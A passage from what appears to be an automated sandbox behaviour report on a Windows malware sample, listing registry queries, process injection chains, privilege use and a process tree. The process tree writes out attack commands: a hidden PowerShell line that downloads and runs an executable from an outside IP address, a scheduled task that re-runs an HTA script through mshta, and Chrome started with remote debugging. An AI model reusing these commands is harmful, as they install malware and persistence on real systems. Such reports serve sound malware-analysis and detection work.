Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary blob value not reproduced in report] C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary blob value not reproduced in report] C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary blob value not reproduced in report] C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\ProgramData\omlnpw\uxek.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2348 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2348 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2348 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2348 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2680 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 2680 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 2680 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 2680 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 2680 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2680 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2680 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2680 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Windows\SysWOW64\WerFault.exe
PID 1452 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Windows\SysWOW64\WerFault.exe
PID 1452 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Windows\SysWOW64\WerFault.exe
PID 1452 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Windows\SysWOW64\WerFault.exe
PID 2680 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 2680 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 2680 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 2680 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 2680 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe
PID 2680 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe
PID 2680 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe
PID 2680 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe
PID 1556 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe C:\Windows\SysWOW64\cmd.exe
PID 1556 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe C:\Windows\SysWOW64\cmd.exe
PID 1556 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe C:\Windows\SysWOW64\cmd.exe
PID 1556 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe C:\Windows\SysWOW64\cmd.exe
PID 1556 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe C:\Windows\SysWOW64\mshta.exe
PID 1556 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe C:\Windows\SysWOW64\mshta.exe
PID 1556 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe C:\Windows\SysWOW64\mshta.exe
PID 1556 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe C:\Windows\SysWOW64\mshta.exe
PID 2000 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2000 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2000 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2000 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2012 wrote to memory of 1672 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2012 wrote to memory of 1672 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2012 wrote to memory of 1672 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2012 wrote to memory of 1672 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Windows\SysWOW64\cmd.exe
PID 2680 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Windows\SysWOW64\cmd.exe
PID 2680 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Windows\SysWOW64\cmd.exe
PID 2680 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Windows\SysWOW64\cmd.exe
PID 1372 wrote to memory of 2920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1372 wrote to memory of 2920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1372 wrote to memory of 2920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1372 wrote to memory of 2920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 1516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2920 wrote to memory of 1516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2920 wrote to memory of 1516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2920 wrote to memory of 1516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1672 wrote to memory of 1452 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE
PID 1672 wrote to memory of 1452 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe

"C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe

"C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1452 -s 68

C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe

"C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"

C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe

"C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn jIzd4maWSGR /tr "mshta C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn jIzd4maWSGR /tr "mshta C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" any_word

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE

"C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

